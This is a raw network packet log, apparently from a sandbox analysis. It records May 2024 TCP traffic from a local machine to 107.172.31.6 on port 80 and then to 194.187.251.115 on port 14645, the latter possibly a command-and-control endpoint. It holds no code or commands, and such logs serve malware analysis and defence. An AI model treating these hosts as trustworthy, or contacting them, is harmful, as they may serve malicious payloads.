                                                      May 1, 2024 14:55:45.605132103 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605146885 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605154991 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605163097 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605180025 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605189085 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605199099 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605216026 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605225086 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605232000 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605247974 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605256081 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605267048 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605283022 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605288982 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605299950 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605318069 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605326891 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605334044 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605350971 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605357885 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605366945 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605382919 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605393887 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605412960 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605417967 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605429888 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605447054 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605464935 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605473042 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605480909 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605499029 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605508089 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605515003 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605531931 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605540991 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605547905 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605565071 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605573893 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605581999 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605597973 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605603933 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605638027 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765463114 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765494108 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765511990 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765531063 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765548944 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765551090 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765574932 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765584946 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765594006 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765610933 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765620947 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765650988 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765667915 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765677929 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765685081 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765701056 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765710115 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765717983 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765736103 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765742064 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765754938 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765774965 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765846014 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765861988 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765880108 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765887022 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765907049 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765922070 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765930891 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765938044 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765954971 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765963078 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.765970945 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765986919 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.765994072 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.766002893 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766026020 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766028881 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.766045094 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766062975 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766067028 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.766122103 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.766766071 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766871929 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766889095 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766905069 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766913891 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.766921043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766937971 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766947031 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.766954899 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766973019 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.766983032 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767013073 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767271996 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767287970 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767306089 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767333984 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767363071 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767395973 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767412901 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767412901 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767436981 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767451048 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767452955 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767469883 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767496109 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767502069 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767518997 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767534018 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767537117 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767565012 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767570972 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767582893 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767613888 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767617941 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767632961 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767664909 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767668962 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767682076 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767713070 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767720938 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767729998 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767745972 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767755032 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767761946 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767779112 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767780066 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767810106 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767815113 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767828941 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767869949 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.767891884 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767909050 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767925024 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767941952 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.767949104 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768012047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768028975 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768033028 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768047094 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768064022 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768073082 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768083096 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768106937 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768121004 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768125057 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768141985 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768161058 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768176079 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768186092 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768203974 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768203974 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768215895 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768240929 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768240929 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768256903 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768260002 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768299103 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768316031 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768361092 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768377066 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768393993 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768408060 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768409967 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768428087 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768429041 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768445015 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768460989 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768461943 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768497944 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768508911 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768526077 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768543005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768559933 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768559933 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768577099 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768594027 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768601894 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768610001 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768627882 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768631935 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768644094 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768662930 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768675089 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768701077 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768709898 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768718958 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768735886 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768752098 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768753052 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768769026 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768785954 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768793106 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768802881 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768819094 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768821001 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768836021 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768852949 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768855095 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768871069 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768888950 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768901110 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768918037 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768934011 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768938065 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.768950939 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.768968105 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769010067 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769026995 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769042969 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769049883 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769061089 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769078016 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769082069 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769093990 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769109964 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769115925 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769125938 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769143105 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769145012 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769159079 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769176006 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769180059 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769191980 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769210100 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769211054 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769218922 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769227982 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769243002 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769260883 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769267082 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769277096 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769293070 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769299984 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769325972 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769334078 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769342899 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769360065 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769376993 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769383907 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769393921 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769411087 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769417048 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769427061 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769442081 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769447088 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769459009 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769474983 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769479990 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769490957 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769507885 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769515038 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769526005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769542933 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769552946 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769560099 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769576073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769582033 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769592047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769608974 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769610882 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769624949 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769642115 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769646883 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769659042 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769675016 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769681931 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769690990 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769709110 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769714117 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769726038 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769737959 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769742012 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769757986 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769773960 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769777060 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769793987 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769809961 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769810915 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769826889 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769843102 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769845009 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769859076 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769875050 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769882917 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769892931 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769918919 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769922018 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769937992 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769956112 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769963026 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769970894 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769987106 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769988060 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770004034 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770020008 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770021915 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770039082 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770055056 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770056009 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770073891 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770092010 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770103931 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770106077 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770112991 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770116091 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770123005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770129919 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770138979 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770142078 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770153046 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770159006 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770164013 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770174980 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770178080 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770194054 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770210981 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770216942 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770226955 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770243883 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770250082 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770260096 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770276070 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770276070 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770294905 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770311117 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770313025 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770330906 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770345926 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770348072 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770365000 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770381927 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770384073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770418882 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.873192072 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:46.041716099 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:46.375164032 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:46.375245094 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:46.400890112 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:46.722963095 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:46.986597061 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:47.324479103 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:47.594975948 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:47.860188007 CEST4917014645192.168.2.22194.187.251.115
